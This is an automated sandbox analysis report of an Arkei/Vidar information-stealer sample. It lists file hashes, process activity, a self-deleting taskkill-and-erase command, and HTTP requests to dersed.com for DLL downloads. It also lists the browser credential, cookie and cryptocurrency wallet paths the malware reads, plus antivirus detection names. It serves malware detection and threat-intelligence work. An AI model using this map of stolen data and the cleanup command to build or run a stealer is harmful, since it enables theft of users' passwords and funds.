paladin316

1272Exes_105f94e56d5fc9fc7555aef13e0af78e_exe_2019-09-06_18_30.txt

Sep 6th, 2019
  1.  
  2. * ID: 1272
  3. * MalFamily: "Arkei"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_105f94e56d5fc9fc7555aef13e0af78e.exe"
  8. * File Size: 722944
  9. * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
  10. * SHA256: "caec69a18e91839c1a46c79c6b55e68e14ba32ec2f2642a375870f958846fc66"
  11. * MD5: "105f94e56d5fc9fc7555aef13e0af78e"
  12. * SHA1: "3bc068404a65522272c36b64cceb2adcabb04fb6"
  13. * SHA512: "4e9136ad3b3b5b4090668ef66e455fc24e5813789a858018022398a84f018f8d7f41573933c3aecda7689926a4d61a1a1494bc5ed81805fb5848757960e777ae"
  14. * CRC32: "BF36EC09"
  15. * SSDEEP: "12288:RkOEBVhr1go+yrFYnldnYBxXNRKuEBzhUEVNjHZ7BOXO3v9tq5o:RkOEBaozrFYns6/5/JBOWv9I"
  16.  
  17. * Process Execution:
  18. "gK19ixrobtPtI0.exe",
  19. "gK19ixrobtPtI0.exe",
  20. "cmd.exe",
  21. "taskkill.exe",
  22. "services.exe",
  23. "lsass.exe",
  24. "svchost.exe",
  25. "WmiPrvSE.exe",
  26. "svchost.exe"
  27.  
  28.  
  29. * Executed Commands:
  30. "\"C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe\"",
  31. "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit",
  32. "C:\\Windows\\System32\\cmd.exe /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit",
  33. "C:\\Windows\\system32\\lsass.exe",
  34. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  35. "taskkill /im gK19ixrobtPtI0.exe /f"
  36.  
  37.  
  38. * Signatures Detected:
  39.  
  40. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  41. "Details":
  42.  
  43.  
  44. "Description": "Behavioural detection: Executable code extraction",
  45. "Details":
  46.  
  47.  
  48. "Description": "Anomalous file deletion behavior detected (10+)",
  49. "Details":
  50.  
  51. "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2172.32295765"
  52.  
  53.  
  54. "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2172.32295765"
  55.  
  56.  
  57. "DeletedFile": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2172.32295781"
  58.  
  59.  
  60. "DeletedFile": "C:\\ProgramData\\freebl3.dll"
  61.  
  62.  
  63. "DeletedFile": "C:\\ProgramData\\mozglue.dll"
  64.  
  65.  
  66. "DeletedFile": "C:\\ProgramData\\msvcp140.dll"
  67.  
  68.  
  69. "DeletedFile": "C:\\ProgramData\\nss3.dll"
  70.  
  71.  
  72. "DeletedFile": "C:\\ProgramData\\softokn3.dll"
  73.  
  74.  
  75. "DeletedFile": "C:\\ProgramData\\vcruntime140.dll"
  76.  
  77.  
  78. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Autofill\\Google Chrome_Default.txt"
  79.  
  80.  
  81. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Autofill"
  82.  
  83.  
  84. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\CC\\Google Chrome_Default.txt"
  85.  
  86.  
  87. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\CC"
  88.  
  89.  
  90. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Edge_Cookies.txt"
  91.  
  92.  
  93. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Google Chrome_Default.txt"
  94.  
  95.  
  96. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\IE_Cookies.txt"
  97.  
  98.  
  99. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies"
  100.  
  101.  
  102. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\cookie_list.txt"
  103.  
  104.  
  105. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Downloads\\Google Chrome_Default.txt"
  106.  
  107.  
  108. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Downloads"
  109.  
  110.  
  111. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\History\\Google Chrome_Default.txt"
  112.  
  113.  
  114. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\History"
  115.  
  116.  
  117. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\information.txt"
  118.  
  119.  
  120. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\passwords.txt"
  121.  
  122.  
  123. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\screenshot.jpg"
  124.  
  125.  
  126. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Soft\\Authy"
  127.  
  128.  
  129. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Soft"
  130.  
  131.  
  132. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Anoncoin"
  133.  
  134.  
  135. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\BBQCoin"
  136.  
  137.  
  138. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Bitcoin"
  139.  
  140.  
  141. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DashCore"
  142.  
  143.  
  144. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DevCoin"
  145.  
  146.  
  147. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DigitalCoin"
  148.  
  149.  
  150. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectronCash"
  151.  
  152.  
  153. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Electrum"
  154.  
  155.  
  156. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectrumLTC"
  157.  
  158.  
  159. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Ethereum"
  160.  
  161.  
  162. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Exodus"
  163.  
  164.  
  165. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FlorinCoin"
  166.  
  167.  
  168. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Franko"
  169.  
  170.  
  171. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FreiCoin"
  172.  
  173.  
  174. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\GoldCoinGLD"
  175.  
  176.  
  177. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\InfiniteCoin"
  178.  
  179.  
  180. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IOCoin"
  181.  
  182.  
  183. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IxCoin"
  184.  
  185.  
  186. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\JAXX"
  187.  
  188.  
  189. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Litecoin"
  190.  
  191.  
  192. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MegaCoin"
  193.  
  194.  
  195. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MinCoin"
  196.  
  197.  
  198. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MultiDoge"
  199.  
  200.  
  201. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\NameCoin"
  202.  
  203.  
  204. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\PrimeCoin"
  205.  
  206.  
  207. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\TerraCoin"
  208.  
  209.  
  210. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\YACoin"
  211.  
  212.  
  213. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Zcash"
  214.  
  215.  
  216. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets"
  217.  
  218.  
  219. "DeletedFile": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\US_00000000-0000-0000-0000-0000000000001449353492.zip"
  220.  
  221.  
  222. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe"
  223.  
  224.  
  225.  
  226.  
  227. "Description": "Guard pages use detected - possible anti-debugging.",
  228. "Details":
  229.  
  230.  
  231. "Description": "Performs HTTP requests potentially not found in PCAP.",
  232. "Details":
  233.  
  234. "url_ioc": "dersed.com:80//288"
  235.  
  236.  
  237. "url_ioc": "dersed.com:80//freebl3.dll"
  238.  
  239.  
  240. "url_ioc": "dersed.com:80//mozglue.dll"
  241.  
  242.  
  243. "url_ioc": "dersed.com:80//msvcp140.dll"
  244.  
  245.  
  246. "url_ioc": "dersed.com:80//nss3.dll"
  247.  
  248.  
  249. "url_ioc": "dersed.com:80//softokn3.dll"
  250.  
  251.  
  252. "url_ioc": "dersed.com:80//vcruntime140.dll"
  253.  
  254.  
  255. "url_ioc": "ip-api.com:80//line/"
  256.  
  257.  
  258.  
  259.  
  260. "Description": "A process created a hidden window",
  261. "Details":
  262.  
  263. "Process": "gK19ixrobtPtI0.exe -> C:\\Windows\\System32\\cmd.exe"
  264.  
  265.  
  266.  
  267.  
  268. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  269. "Details":
  270.  
  271. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  272.  
  273.  
  274. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  275.  
  276.  
  277. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  278.  
  279.  
  280. "suspicious_request_iocs": "http://dersed.com/288"
  281.  
  282.  
  283. "suspicious_request_iocs": "http://dersed.com/freebl3.dll"
  284.  
  285.  
  286. "suspicious_request_iocs": "http://dersed.com/mozglue.dll"
  287.  
  288.  
  289. "suspicious_request_iocs": "http://dersed.com/msvcp140.dll"
  290.  
  291.  
  292. "suspicious_request_iocs": "http://dersed.com/nss3.dll"
  293.  
  294.  
  295. "suspicious_request_iocs": "http://dersed.com/softokn3.dll"
  296.  
  297.  
  298. "suspicious_request_iocs": "http://dersed.com/vcruntime140.dll"
  299.  
  300.  
  301. "suspicious_request_iocs": "http://ip-api.com/line/"
  302.  
  303.  
  304. "suspicious_request_iocs": "http://dersed.com/"
  305.  
  306.  
  307.  
  308.  
  309. "Description": "Performs some HTTP requests",
  310. "Details":
  311.  
  312. "url_iocs": "http://dersed.com/288"
  313.  
  314.  
  315. "url_iocs": "http://dersed.com/freebl3.dll"
  316.  
  317.  
  318. "url_iocs": "http://dersed.com/mozglue.dll"
  319.  
  320.  
  321. "url_iocs": "http://dersed.com/msvcp140.dll"
  322.  
  323.  
  324. "url_iocs": "http://dersed.com/nss3.dll"
  325.  
  326.  
  327. "url_iocs": "http://dersed.com/softokn3.dll"
  328.  
  329.  
  330. "url_iocs": "http://dersed.com/vcruntime140.dll"
  331.  
  332.  
  333. "url_iocs": "http://ip-api.com/line/"
  334.  
  335.  
  336. "url_iocs": "http://dersed.com/"
  337.  
  338.  
  339.  
  340.  
  341. "Description": "The binary likely contains encrypted or compressed data.",
  342. "Details":
  343.  
  344. "section": "name: .text, entropy: 7.95, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x000afc00, virtual_size: 0x000afa54"
  345.  
  346.  
  347.  
  348.  
  349. "Description": "Uses Windows utilities for basic functionality",
  350. "Details":
  351.  
  352. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit"
  353.  
  354.  
  355. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit"
  356.  
  357.  
  358.  
  359.  
  360. "Description": "Behavioural detection: Injection (Process Hollowing)",
  361. "Details":
  362.  
  363. "Injection": "gK19ixrobtPtI0.exe(2172) -> gK19ixrobtPtI0.exe(2260)"
  364.  
  365.  
  366.  
  367.  
  368. "Description": "Executed a process and injected code into it, probably while unpacking",
  369. "Details":
  370.  
  371. "Injection": "gK19ixrobtPtI0.exe(2172) -> gK19ixrobtPtI0.exe(2260)"
  372.  
  373.  
  374.  
  375.  
  376. "Description": "Deletes its original binary from disk",
  377. "Details":
  378.  
  379.  
  380. "Description": "Behavioural detection: Injection (inter-process)",
  381. "Details":
  382.  
  383.  
  384. "Description": "Steals private information from local Internet browsers",
  385. "Details":
  386.  
  387. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Edge_Cookies.txt"
  388.  
  389.  
  390. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Google Chrome_Default.txt"
  391.  
  392.  
  393. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\IE_Cookies.txt"
  394.  
  395.  
  396. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  397.  
  398.  
  399. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  400.  
  401.  
  402. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  403.  
  404.  
  405. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  406.  
  407.  
  408.  
  409.  
  410. "Description": "Collects information about installed applications",
  411. "Details":
  412.  
  413. "Program": "Google Update Helper"
  414.  
  415.  
  416. "Program": "Microsoft Excel MUI 2013"
  417.  
  418.  
  419. "Program": "Microsoft Outlook MUI 2013"
  420.  
  421.  
  422.  
  423.  
  424. "Program": "Google Chrome"
  425.  
  426.  
  427. "Program": "Adobe Flash Player 29 NPAPI"
  428.  
  429.  
  430. "Program": "Adobe Flash Player 29 ActiveX"
  431.  
  432.  
  433. "Program": "Microsoft DCF MUI 2013"
  434.  
  435.  
  436. "Program": "Microsoft Access MUI 2013"
  437.  
  438.  
  439. "Program": "Microsoft Office Proofing Tools 2013 - English"
  440.  
  441.  
  442. "Program": "Microsoft Office Proofing Tools 2013 - Español"
  443.  
  444.  
  445. "Program": "Microsoft Publisher MUI 2013"
  446.  
  447.  
  448. "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
  449.  
  450.  
  451. "Program": "Microsoft Office Shared MUI 2013"
  452.  
  453.  
  454. "Program": "Microsoft Office OSM MUI 2013"
  455.  
  456.  
  457. "Program": "Microsoft InfoPath MUI 2013"
  458.  
  459.  
  460. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  461.  
  462.  
  463. "Program": "Microsoft Word MUI 2013"
  464.  
  465.  
  466. "Program": "Microsoft Groove MUI 2013"
  467.  
  468.  
  469.  
  470.  
  471. "Program": "Microsoft Access Setup Metadata MUI 2013"
  472.  
  473.  
  474. "Program": "Microsoft Office OSM UX MUI 2013"
  475.  
  476.  
  477. "Program": "Java Auto Updater"
  478.  
  479.  
  480. "Program": "Microsoft PowerPoint MUI 2013"
  481.  
  482.  
  483. "Program": "Microsoft Office Professional Plus 2013"
  484.  
  485.  
  486. "Program": "Adobe Refresh Manager"
  487.  
  488.  
  489. "Program": "Microsoft Office Proofing 2013"
  490.  
  491.  
  492. "Program": "Microsoft Lync MUI 2013"
  493.  
  494.  
  495.  
  496.  
  497. "Program": "Microsoft OneNote MUI 2013"
  498.  
  499.  
  500.  
  501.  
  502. "Description": "Stack pivoting was detected when using a critical API",
  503. "Details":
  504.  
  505. "process": "svchost.exe:672"
  506.  
  507.  
  508.  
  509.  
  510. "Description": "File has been identified by 37 Antiviruses on VirusTotal as malicious",
  511. "Details":
  512.  
  513. "MicroWorld-eScan": "Trojan.GenericKD.32387802"
  514.  
  515.  
  516. "FireEye": "Generic.mg.105f94e56d5fc9fc"
  517.  
  518.  
  519. "McAfee": "RDN/Generic.grp"
  520.  
  521.  
  522. "AegisLab": "Trojan.MSIL.Chapak.4!c"
  523.  
  524.  
  525. "K7AntiVirus": "Trojan ( 005573d61 )"
  526.  
  527.  
  528. "K7GW": "Trojan ( 005573d61 )"
  529.  
  530.  
  531. "Cybereason": "malicious.04a655"
  532.  
  533.  
  534. "Arcabit": "Trojan.Generic.D1EE32DA"
  535.  
  536.  
  537. "Invincea": "heuristic"
  538.  
  539.  
  540. "Symantec": "ML.Attribute.HighConfidence"
  541.  
  542.  
  543. "APEX": "Malicious"
  544.  
  545.  
  546. "Paloalto": "generic.ml"
  547.  
  548.  
  549. "Kaspersky": "HEUR:Trojan.MSIL.Chapak.gen"
  550.  
  551.  
  552. "BitDefender": "Trojan.GenericKD.32387802"
  553.  
  554.  
  555. "Avast": "Win32:Trojan-gen"
  556.  
  557.  
  558. "Ad-Aware": "Trojan.GenericKD.32387802"
  559.  
  560.  
  561. "Sophos": "Mal/Generic-S"
  562.  
  563.  
  564. "DrWeb": "Trojan.Inject3.20236"
  565.  
  566.  
  567. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.bc"
  568.  
  569.  
  570. "Emsisoft": "Trojan.GenericKD.32387802 (B)"
  571.  
  572.  
  573. "SentinelOne": "DFI - Malicious PE"
  574.  
  575.  
  576. "Microsoft": "Trojan:MSIL/CryptInject"
  577.  
  578.  
  579. "Endgame": "malicious (moderate confidence)"
  580.  
  581.  
  582. "ZoneAlarm": "HEUR:Trojan.MSIL.Chapak.gen"
  583.  
  584.  
  585. "GData": "Trojan.GenericKD.32387802"
  586.  
  587.  
  588. "Acronis": "suspicious"
  589.  
  590.  
  591. "MAX": "malware (ai score=100)"
  592.  
  593.  
  594. "Malwarebytes": "Spyware.Vidar"
  595.  
  596.  
  597. "ESET-NOD32": "a variant of Generik.LSRSOXR"
  598.  
  599.  
  600. "Ikarus": "Trojan.SuspectCRC"
  601.  
  602.  
  603. "MaxSecure": "Trojan.Malware.300983.susgen"
  604.  
  605.  
  606. "Fortinet": "MSIL/Malicious_Behavior.VEX"
  607.  
  608.  
  609. "Webroot": "W32.Trojan.Emotet"
  610.  
  611.  
  612. "AVG": "Win32:Trojan-gen"
  613.  
  614.  
  615. "Panda": "Trj/GdSda.A"
  616.  
  617.  
  618. "CrowdStrike": "win/malicious_confidence_100% (W)"
  619.  
  620.  
  621. "Qihoo-360": "Win32/Trojan.973"
  622.  
  623.  
  624.  
  625.  
  626. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  627. "Details":
  628.  
  629.  
  630. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  631. "Details":
  632.  
  633. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  634.  
  635.  
  636. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Bitcoin\\\\x12"
  637.  
  638.  
  639. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Bitcoin\\*.*"
  640.  
  641.  
  642. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\\\x12"
  643.  
  644.  
  645. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Electrum\\\n"
  646.  
  647.  
  648. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  649.  
  650.  
  651. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
  652.  
  653.  
  654. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Electrum\\*.*"
  655.  
  656.  
  657. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  658.  
  659.  
  660. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Litecoin\\*.*"
  661.  
  662.  
  663. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Litecoin\\"
  664.  
  665.  
  666. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  667.  
  668.  
  669. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\NameCoin\\*.*"
  670.  
  671.  
  672. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\NameCoin\\"
  673.  
  674.  
  675. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  676.  
  677.  
  678. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  679.  
  680.  
  681. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  682.  
  683.  
  684. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\TerraCoin\\"
  685.  
  686.  
  687. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\TerraCoin\\*.*"
  688.  
  689.  
  690. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  691.  
  692.  
  693. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\PrimeCoin\\*.*"
  694.  
  695.  
  696. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  697.  
  698.  
  699. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  700.  
  701.  
  702. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\PrimeCoin\\"
  703.  
  704.  
  705. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  706.  
  707.  
  708. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FreiCoin\\*.*"
  709.  
  710.  
  711. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  712.  
  713.  
  714. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FreiCoin\\"
  715.  
  716.  
  717. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DevCoin\\"
  718.  
  719.  
  720. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  721.  
  722.  
  723. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  724.  
  725.  
  726. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DevCoin\\*.*"
  727.  
  728.  
  729. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  730.  
  731.  
  732. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Franko\\*.*"
  733.  
  734.  
  735. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Franko\\"
  736.  
  737.  
  738. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  739.  
  740.  
  741. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  742.  
  743.  
  744. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MegaCoin\\"
  745.  
  746.  
  747. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MegaCoin\\*.*"
  748.  
  749.  
  750. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  751.  
  752.  
  753. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\InfiniteCoin\\*.*"
  754.  
  755.  
  756. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  757.  
  758.  
  759. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  760.  
  761.  
  762. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\InfiniteCoin\\"
  763.  
  764.  
  765. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IxCoin\\"
  766.  
  767.  
  768. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  769.  
  770.  
  771. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IxCoin\\*.*"
  772.  
  773.  
  774. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  775.  
  776.  
  777. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Anoncoin\\*.*"
  778.  
  779.  
  780. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  781.  
  782.  
  783. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  784.  
  785.  
  786. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Anoncoin\\"
  787.  
  788.  
  789. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  790.  
  791.  
  792. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\BBQCoin\\"
  793.  
  794.  
  795. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\BBQCoin\\*.*"
  796.  
  797.  
  798. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  799.  
  800.  
  801. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  802.  
  803.  
  804. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DigitalCoin\\"
  805.  
  806.  
  807. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DigitalCoin\\*.*"
  808.  
  809.  
  810. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  811.  
  812.  
  813. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  814.  
  815.  
  816. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MinCoin\\"
  817.  
  818.  
  819. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MinCoin\\*.*"
  820.  
  821.  
  822. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  823.  
  824.  
  825. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  826.  
  827.  
  828. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
  829.  
  830.  
  831. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  832.  
  833.  
  834. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  835.  
  836.  
  837. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\YACoin\\"
  838.  
  839.  
  840. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\YACoin\\*.*"
  841.  
  842.  
  843. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  844.  
  845.  
  846. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FlorinCoin\\*.*"
  847.  
  848.  
